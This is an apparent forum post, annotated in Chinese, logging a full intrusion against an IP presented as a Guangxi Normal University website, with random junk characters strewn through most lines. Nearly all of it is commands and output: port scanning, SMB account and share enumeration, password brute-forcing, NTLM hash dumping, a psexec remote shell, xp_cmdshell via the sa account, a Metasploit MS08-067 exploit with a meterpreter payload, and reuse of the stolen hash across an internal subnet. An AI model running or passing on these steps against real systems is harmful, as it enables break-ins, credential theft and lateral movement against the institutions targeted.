广西师范网站http://202.103.242.241/
/ [ k5 j' A, u- s: H6 d1 P {5 f' J
root@bt:~# nmap -sS -sV 202.103.242.2416 Y9 L, B: X( G
# K/ e$ P4 B- T" G1 ~3 c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
; k: l1 O: ~7 D$ w9 G4 Y, D- f) j2 k2 s" [
Nmap scan report for bogon (202.103.242.241)7 H1 f1 ^: a8 Q. E" X* a
& Q( D' g' }5 a3 @
Host is up (0.00048s latency).
5 D M' P& g* `, O
8 g" N6 S) p2 O2 r6 Z! {$ QNot shown: 993 closed ports
: v/ X+ u" e: r' }$ x" D9 y) U2 J" T: s& L5 n
PORT STATE SERVICE VERSION* X8 _* A9 O3 x! Q/ W8 ]8 ^" }
# L5 \" N5 e3 U. G6 H! F
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)6 T V7 g. f6 U; U% [
7 Q, ]: O2 Y0 Y I0 o: C7 l/ i/ ] u139/tcp open netbios-ssn
$ `5 ^* M; D$ P; R" d" p. n k* h
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds7 N4 `9 ?" s: i7 N8 ^6 T
3 g+ s% |3 U0 A# E0 k T& y4 n8 `1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)4 |3 c& ]% Y% x
) y& ~/ S8 M/ O, g2 h( v9 V, m1026/tcp open msrpc Microsoft Windows RPC! C6 m! E9 D, e& _
4 g! f' ^9 g& w1 H0 m9 R; i: ^
3372/tcp open msdtc?* Z) U& K7 b6 w+ V( O
- e% k$ o. W3 U
3389/tcp open ms-term-serv?
# I$ D9 [$ F3 |
8 w; `, X5 d: n' O. d( u. a: N1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :& }; w" p% s- O
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
( G8 m' b" x# Q# B2 j; R# a3 f7 j9 z( l6 F& G
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions% c* ~/ d4 V3 a% }
2 _' u* A( N! ?6 T
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
6 j7 |3 D! w- C! }
7 [. s3 ]4 l- B. X; @' HSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO! r4 I( _8 k1 L. d n7 K/ G) _! d
4 P# k& s! j OSF:ptions,6,”hO\n\x000Z”);; z! x( F5 p" b* g
! A' A$ j' E0 g5 J3 D* IMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)$ H8 n1 q7 v, b* j0 b4 m
- F! _! e) W$ i) w' Z- c' O6 l" v; g
Service Info: OS: Windows ^$ v) ~+ d' V. n" A
& ?& g$ t5 K0 A. ~
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .( `3 m3 B$ h- B `
- |% C/ I0 x& [. ?: w3 h
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds, ]! ^5 D& k; [# A" _& U
* [& B' ?( @# H( n8 m9 e
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本6 B! `+ R, z; D0 x
, _, P2 D" v# \, ^: y-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse: _/ X" C7 T9 N# S! ]# z3 z
, V7 N# j8 |/ X* p F- g
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
7 L3 I) H5 E, t( N$ B3 {! h+ r' y2 {( @: b
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse1 H9 L, ?5 U! v% U( d* W
) @9 n3 w* U$ U, R/ M. K
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse, q2 R. j+ {! \' a( E
3 b- J( _3 w* z' P. H2 N' q* J
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
/ G) e/ b1 V1 S3 z6 V
6 }$ }1 g1 ^ P-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
+ A5 _ j0 y7 E E- n" I. Z
( r Q, w1 I! \9 x-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
0 g4 o6 C/ X" ^2 ]! c5 ~8 j9 ?6 ~3 j! ], J; A& R% S4 H4 P0 D4 N
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse8 Z7 p6 Q9 G Y. L) c
: B* A; b( t! u+ P# H1 O-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse+ S2 ?9 a0 U4 ?# G B
' d; t3 C, X7 M# H
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse, U6 T8 D: Y! B
/ [% k5 x6 j: X9 f) e% j Z/ Z-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 x. T) R1 i, j- L
7 }% E x* t- h1 y9 Y( ~-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse1 w- Q. p1 n* ~( K/ `7 n3 p' p, f
9 J& y& `8 z }0 |: r% u- q/ a
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
, Q2 K' G4 A& j3 u
! K6 l/ j2 x+ Q) |9 A+ {-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse. T0 |, \9 x$ f; @ b/ M
( I$ p; [& j) z6 y2 M- h; x/ W
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
% c: y6 f( W9 Z0 b2 ?4 h3 E# P, v! x; ~. p& q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
( W% Z/ N$ h$ |0 F7 O
9 X$ |9 P' ~8 }' h$ E8 D# h& E+ i//此乃使用脚本扫描远程机器所存在的账户名3 E4 H7 ] {4 A- A! D0 |9 B
$ E% M/ C& j: O" w) ^* eStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST$ k# O3 q+ e+ ~0 |( M7 W) j
' X8 |9 h% s# C- K# A3 c' \7 u
Nmap scan report for bogon (202.103.242.241)
5 M8 [( V5 W- G; T1 P8 G: h+ n; ^9 B* D* K0 m
Host is up (0.00038s latency).1 r) ]9 g( e+ B5 p$ m( r! S
$ b& B3 b! a6 O/ a( F; MNot shown: 993 closed ports
* h" @9 X9 z* j9 r6 s' S! \# C+ m+ v. D4 U, W
PORT STATE SERVICE
& Z* `5 {) a- k: g/ m# W/ n
" X5 S w% ^$ g; w135/tcp open msrpc
0 _: K! `; k- R, t9 J) F' F7 \7 O+ R; }; H' U
139/tcp open netbios-ssn
) ^% Z! N5 k+ U! W
! \: |& g" Q/ \" N2 e445/tcp open microsoft-ds
5 A9 }# Z: J6 a, s0 T E; i* Y
0 h. j, x' V- X# c1025/tcp open NFS-or-IIS8 l; P3 x- b" B
" l/ P9 ?1 W& D, _ J: N) N6 p
1026/tcp open LSA-or-nterm5 \! q, x1 {& {( L) a
$ y% x( ~/ \4 [" w( v3372/tcp open msdtc
: G( J6 X$ ^' X" n" l8 l5 _" w: Q- I
3389/tcp open ms-term-serv
7 i# M. r/ r9 k5 R7 t( T! Y! M. _: e! q: b+ h) w8 L4 |
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
) v2 D6 b2 [3 }# m9 W9 i7 m; K
' _( s! i+ S: V. [1 sHost script results:
) O8 c8 c+ C1 m( |+ R- a
5 K/ l# I* P- J3 h" [3 R/ \| smb-enum-users:
1 G1 S; I4 E! A9 z, R6 n8 L- d3 ^9 ~( |
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
- {4 W- ~6 ~8 ]& b4 T8 W4 _# G2 z
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
' H$ ?4 Q6 f5 i1 J+ G
$ V- O! x! V, t6 w% n. Q2 M* `1 Zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
" L0 _3 s; a. W2 L& k" a- Y( K$ G9 }* Z: N( h
//查看共享0 ] k7 x/ d- x1 l! L; }) |$ T! l
/ F+ K' N( y: B: o2 i. `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST' l* ?' }% [) B' ^
) B: b( _. `% L7 u* l- d
Nmap scan report for bogon (202.103.242.241)
6 x) v" v1 E1 E5 r7 q. s/ X4 {/ z* J( ]$ E" f: [
Host is up (0.00035s latency).
0 `; J# g( `8 s) Q; Z( a% v8 t0 o' w8 E
Not shown: 993 closed ports
8 D& N7 L1 j% ?! U% g0 R9 ]& o" u. V8 X
PORT STATE SERVICE
$ w8 V2 R `7 h! o) M6 o! w6 J
: {9 H% ?+ U- {/ Z9 }" |135/tcp open msrpc @# O1 c1 R8 D3 I( [
" [( K' s* y' M9 {' q- E8 k139/tcp open netbios-ssn: Z' A& @$ W8 F. h/ b/ y
+ ^. o2 E8 T2 f: k& a! n4 @445/tcp open microsoft-ds
( d# s! ~9 O3 k/ x L" F- }% ^+ h- Y5 M# B
1025/tcp open NFS-or-IIS
: t$ f( A# J% c6 `, P
2 I$ q/ b2 t" d; O1 x. d1026/tcp open LSA-or-nterm
, @- w. v6 A7 P
8 O, v/ f+ W4 T1 k- ?: ^' M* H3372/tcp open msdtc' ?0 Q/ r' o0 j/ {+ c! _. g
% q* p: @1 M5 g/ n3 a
3389/tcp open ms-term-serv/ R F6 R. H2 `. t6 ]+ L/ \
8 f; C( D7 \ p% @0 s: `
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
# X8 g( @7 c& C' S5 a; B4 d5 e/ v3 e. Z
Host script results:; S' N) _$ _7 ^- f" u! x( M
# G7 r9 ?) A; _# n# S6 E6 D4 _! f| smb-enum-shares:4 q7 o% {! E' o+ E/ a! y
+ H+ Z7 Q( j0 {5 }: M: Q% P: M, W/ c| ADMIN$
6 U4 K! I/ S/ f2 y/ v6 I5 `- G/ k' o! s6 U2 M1 t
| Anonymous access: <none>9 U9 ]/ p$ s5 `7 n; R0 J
; c2 w% O" P8 r; B0 H& V& E5 o# X
| C$
- ]" w- q3 K2 ~! o! Y
, n8 y* }( O) H6 H" ]% L$ [| Anonymous access: <none>- d" X) K, U% Z1 ~/ N' B% _
8 _ T. T1 V' K4 |3 y) ^! V6 Z9 M
| IPC$
; c% ?7 C, H; |' {2 Z, c5 q Z, I
6 [; W. G; Z- \( }& r, i; j1 H|_ Anonymous access: READ
2 x+ ]( O7 Y; s/ @+ Y1 W/ f' m0 ~8 v1 [8 @ z, o6 I
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
* L3 n/ @' i1 y6 ]) s7 }5 w2 x/ w* I# _. u7 W2 u! h8 \. K7 Q3 A$ j
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
9 C+ s+ u6 b. F8 K! ?% ?; Z/ c! m) g4 H W1 D6 k. ?: N
//获取用户密码0 U. e( Z$ v& r; x6 C! g. g# V/ Y
9 @# o; M0 N2 vStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST8 B0 B" U' k$ |' A' }4 i
9 b1 l. l( F) C3 K" }# k
Nmap scan report for bogon (202.103.242.2418)
" _$ Y: P0 U" `' C/ m# W5 E& C; b+ L6 w$ t3 Q
Host is up (0.00041s latency).& Q ?9 M" v" Z7 H9 Q
' ]2 H! k. E& h; g! }& rNot shown: 993 closed ports4 E2 a! n0 [& T( f7 ?
; V5 E; u( S/ [ \
PORT STATE SERVICE
" n4 x0 q1 n/ ]# V& }' i! f, ]* x$ Y; k* R4 W: Y
135/tcp open msrpc
& E T& T2 X- ~8 L9 F1 W: {7 ?- ?! B- J5 P8 j! t* @
139/tcp open netbios-ssn, A; s4 E! Y! K& [+ {/ Z
4 i$ g* N3 i2 K445/tcp open microsoft-ds% |- K6 L0 p" E& _
1 I1 M! B( [- t4 P. N% h; z1025/tcp open NFS-or-IIS/ `4 P j/ Y" p' a0 }3 S9 J
& o8 e( Z( s! [; P; V1026/tcp open LSA-or-nterm: @$ J2 F' M$ e% P( K! H- x
& b9 I0 h5 W8 i' }' Q
3372/tcp open msdtc
* v8 r# a U L5 I; f# G
* `% i% _) M) |8 @& r3389/tcp open ms-term-serv
\$ x' }& Z b5 G3 f
$ h. c7 z* w4 r* I" e$ j. u/ `' L8 k8 U. mMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( a! ]; W1 [3 \4 w2 }" c, _9 D( k, X+ V+ `4 B* w5 Z7 ]
Host script results:
' f) l% y# h+ R- ^$ X) a0 t7 f( M3 C: ]1 k
| smb-brute:2 a9 r% e4 x7 e' X
* ?8 M/ s7 t2 Nadministrator:<blank> => Login was successful
# A, r# E( ?# L u* \! Q
2 b& ~1 e( K4 X; ~( F+ z|_ test:123456 => Login was successful
/ p9 q9 ?) ?) O& p& K7 R* D3 Q8 c' @; M
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
% r4 E2 W% D8 ~+ [/ g: J$ c6 U% \1 i* }/ t
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
5 J$ R5 r" }2 W+ K0 ]
6 Q1 ~( U1 h3 }5 y% Nroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
( T; M$ ], V# j6 D' e: s
4 x, h8 T9 u" i' Droot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
/ U C8 `! T. e$ ~( K& F. o: k$ h. S* ^/ Y( [9 z5 j# P2 P! w8 a& u: _
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
% C/ r% v% _7 S. D9 j/ T
5 i$ x7 b q( u+ L9 a& m3 g/ P; ~Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
$ M0 F* c4 Z0 I! E. G' ~! _. B% I8 l4 P# ]
Nmap scan report for bogon (202.103.242.241)5 J( o) i- h( ~
) t/ V' k8 B( t: c) P
Host is up (0.0012s latency).: `9 F E i: M
* u) E8 ^- {7 s& O: R
PORT STATE SERVICE
" }! j. f/ s# v1 F( z# z& E, l) a+ ^) S6 a
135/tcp open msrpc
" \5 v& a: p a' x
# R. f' u" o" q' i5 l* }3 m4 y139/tcp open netbios-ssn( r" ~' r; p7 f8 j
& d) T9 N/ t+ c* e8 C" R
445/tcp open microsoft-ds
3 ~0 u7 p! ^+ {0 G. D7 G# c5 e& \" m! b. v/ s
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)8 E, D8 N4 D. D$ ?) C! G
: R! P8 S* y) P2 w! j, AHost script results:
+ ?! Y3 l/ t$ ~- P$ S( g! ^9 {* O. L1 {+ t. z: C9 x
| smb-pwdump:+ P( a9 A; ]" p. [5 \
* d+ _6 d/ p- a8 @# U- M7 S| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************/ m! f w. q8 {9 k5 w# v
* y O; w& O8 {: Y2 [: N( q
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
( i- j# i, | q' E8 ~- B! r3 c) k O* [
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4' v) k$ D- C1 B: L. P
! D5 F Y2 k2 W% A# P$ d7 p
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
+ u4 A: G/ g E: @
. |* [4 O" O" J9 Z, t5 X" KNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
5 W2 \; k7 G7 h. [2 A. |% ?
* I' u; V1 g% B! Q: K! A6 k) u) [C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell9 i9 ^/ j, ?: {5 Y0 o: b7 F
' e6 |( y/ w& r! n' S* F
-p 123456 -e cmd.exe' o% {% b" e* T+ j) C
" }$ c- a. c8 MPsExec v1.55 – Execute processes remotely
. h4 L" I) M/ U5 B- {" ^/ E2 w8 N8 D; b' l9 Q0 D
Copyright (C) 2001-2004 Mark Russinovich9 E8 ]7 j; n- X/ \
- }8 x+ u3 H9 N+ o5 C' P
Sysinternals – www.sysinternals.com
7 X, V& f1 M8 [1 i" h% u$ n9 g2 S$ r* I
Microsoft Windows 2000 [Version 5.00.2195]
W" N( G) I1 z" p
4 W" z0 y! j O5 f8 I8 f% }(C) 版权所有 1985-2000 Microsoft Corp.
4 E4 ~8 y9 u. T+ k! v) B
3 n$ [% c% C& ~C:\WINNT\system32>ipconfig( J& W2 v) N( X) l6 b* _
# r6 Q- X" y2 e3 B$ I) [* L9 F
Windows 2000 IP Configuration* Q: x$ k* c- k7 Y) m& g6 G: Q
4 m. p' @4 r3 X& t5 m( z
Ethernet adapter 本地连接:
, g" A; Q5 w2 b) j' ?, ~8 B5 }# @3 ^
Connection-specific DNS Suffix . :
7 s4 A" g! M0 W2 ~! _" h& K) h2 \
$ t7 b: A, x( mIP Address. . . . . . . . . . . . : 202.103.242.241. X! v( Q0 U1 V* M- M. N9 l$ o) Q9 E
. F$ Q9 T0 c8 l2 v+ s
Subnet Mask . . . . . . . . . . . : 255.255.255.0# v* \+ o6 Z$ q
1 W$ r" A z( E R* Z! yDefault Gateway . . . . . . . . . : 202.103.1.1" Q7 g3 y0 H3 [: E
4 m& \, I2 `; w. y- L1 k; t+ O
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
8 t0 D) }) H/ w1 s. k: C
, Y; I c- A* ]( A* z+ N1 q7 Aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
5 N; |) G- Q Y8 t7 {0 L+ E; E
4 c3 p. C/ q X5 [Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST9 O2 `# J/ i% R3 o
$ b8 }6 K5 P0 l/ O1 G0 @1 }! I" p
Nmap scan report for bogon (202.103.242.241)
, g3 X; J' m9 N1 B5 q' \9 D6 q# b4 \. V( s, o N
Host is up (0.00046s latency).
% k J- z* t! b' i( N9 ^9 y! @* p( N& _) ]6 [$ B
Not shown: 993 closed ports. |, h0 X. }! N' [0 W2 Y
! f4 Q$ v7 r- v2 y( f: K" OPORT STATE SERVICE
+ W$ G" u' D* r! T3 u
7 W. X- o$ I4 f" D. [" d9 T135/tcp open msrpc5 M, {, ]% ?& J. q; p
3 T. {$ ]# Z: K$ F7 l
139/tcp open netbios-ssn
7 [+ J6 z0 @* v2 \# n) } h) ?9 k8 K/ H
445/tcp open microsoft-ds/ u: _# {( F; E5 K# Z' I
7 \& E: ?( n; u' o
1025/tcp open NFS-or-IIS* u# |0 p) U% v4 m) o" s
& P, q8 Z8 ?" @ y' s- v- O
1026/tcp open LSA-or-nterm
/ E3 J, J( m- \$ O" E- p% e9 M2 G! r: w* H- H! \, E
3372/tcp open msdtc
, g I0 [! R5 m! l$ z# f9 O; e# } E* Z% ^/ S, D9 `4 n4 o @7 d
3389/tcp open ms-term-serv7 ~7 |" Z* C0 |- S
5 Z8 N( {7 Y: X
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( }0 N: {6 `. D/ h; p; g$ O4 s0 W* T _6 ?4 G4 m
Host script results:
# y$ Y. b) B% n% A% z5 {2 M! W; R$ t t% g+ w- L: R; t# s. V
| smb-check-vulns:
* l$ D- _& L" W
; p, h9 _' J* l2 I" W3 `|_ MS08-067: VULNERABLE. W0 N2 ~: v# P: s6 a3 M
# }1 L" ?6 x( r: vNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
* s8 @0 n0 S l0 c* }$ K
Q7 h/ e, j: _6 }- M% W3 Lroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
: g" g9 c( a' R# @
& D2 @4 l+ `: z% ^msf > search ms08
8 {! C( P" M* `
5 j# @( J0 f5 s4 k4 C7 U5 ~& F* ^msf > use exploit/windows/smb/ms08_067_netapi+ J+ Q: Y( C8 b; k, m
6 g2 `( x o+ p1 Umsf exploit(ms08_067_netapi) > show options
7 n% y7 f2 n% y; r P0 [: l
) k: w$ q- F( J. s2 g b" {9 Z5 jmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2415 r/ F# k# S/ V
|, k9 k" [4 a x8 x! A
msf exploit(ms08_067_netapi) > show payloads( ~# T! h2 S( F8 E' M$ ]) c8 [
. b7 ~; E! L5 U5 b$ e6 R* U
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
6 u9 Q/ Q7 u, F' x8 y
0 A. B% a. K! Q4 Tmsf exploit(ms08_067_netapi) > exploit" V0 D; l; s& T5 g% y) F
, d0 ]% a0 b w; M: W& d# ]) cmeterpreter >
, s. P/ @. }$ x. ^9 R' S- E$ c# U! v! }; M+ I0 m
Background session 2? [y/N] (ctrl+z)
( o% O! V% t. @8 f
3 `7 F' y l) C1 q% {6 `msf exploit(ms08_067_netapi) > sessions -l
: \4 D T+ T( L ^( ]) h: ?. z5 ~! d" r2 v1 W
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt' e" ^- n1 U! q- H7 {3 j
- N$ v+ j, {. M) z4 k$ w `) Q: V
test+ U: I% X% A+ Y+ B0 L# v
" u* c/ s1 {' o( s4 E: vadministrator
9 E; M0 I& k1 ?' r8 |1 S& V0 ^' x4 q& U( @ _' p2 ^
root@bt:/usr/local/share/nmap/scripts# vim password.txt
4 k5 s& S' e) J& i+ X; @! ?% f. Y$ i2 `! \. L
44EFCE164AB921CAAAD3B435B51404EE3 F4 Q l7 q/ O
4 c3 y$ ^8 G8 t4 }2 m& rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
, x; A7 h4 Q; ` m2 e0 [# E$ b1 ?1 r, `8 n: t
//利用用户名跟获取的hash尝试对整段内网进行登录' T; W* M+ i1 H: _6 m
! y+ G4 i% e! g3 \% R- p
Nmap scan report for 192.168.1.1056 y D% O3 P! d& _$ h4 m" y
5 F/ V" U0 p$ U- _6 @Host is up (0.00088s latency).
! Y5 O# r5 {! G$ Z, i4 h( b/ j6 a
Not shown: 993 closed ports
# R! N- h! m: [1 R$ ?9 q0 @! A9 W2 c$ A. b3 m% t
PORT STATE SERVICE
) ]8 E( g4 } S4 t4 }$ b6 @* N. G; a+ x
135/tcp open msrpc
" _* X% d5 f% |6 r1 c& q8 X# f. n* W, h( x0 S
139/tcp open netbios-ssn
3 R, v" W: X. L" }; }0 s. A8 y7 h9 E
445/tcp open microsoft-ds
6 ?9 v* E5 p% j- ^) B. o$ ?
3 R9 _6 U3 v' C( h. ~8 B- ^1025/tcp open NFS-or-IIS
0 H1 r& W$ l1 Q# i- p+ \* C4 S/ y# i0 h+ f
1026/tcp open LSA-or-nterm
- u. E5 M! Y0 [* N
* G ~" t9 c; y! ]3372/tcp open msdtc
! q0 l4 g8 w l$ c2 w" C6 ]& r3 k) t+ u) \! }
3389/tcp open ms-term-serv. {) }+ q0 H% f8 h
( P" g- R# w5 q {& ?" ^! i c+ F
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems). Q: I7 ?* i" D% D3 e
+ @! w/ ~, ?5 ^1 E% x" S0 O
Host script results:( @% M5 w- T2 j3 Y0 w) G' i
2 [5 E7 {: `& V" f& R2 D* T| smb-brute:( O1 y& O2 t% z" n- o$ ?' ^
) u |% y" Q. e# g' F# x' K0 G|_ administrator:<blank> => Login was successful! B2 g& F: j0 p# [) {" }
( f8 D; h% K. [* Q. K+ J! ]# L, \攻击成功,一个简单的msf+nmap攻击~~·
* N" X; v G( |4 t6 N' J5 V; {( {) X* Q% `
|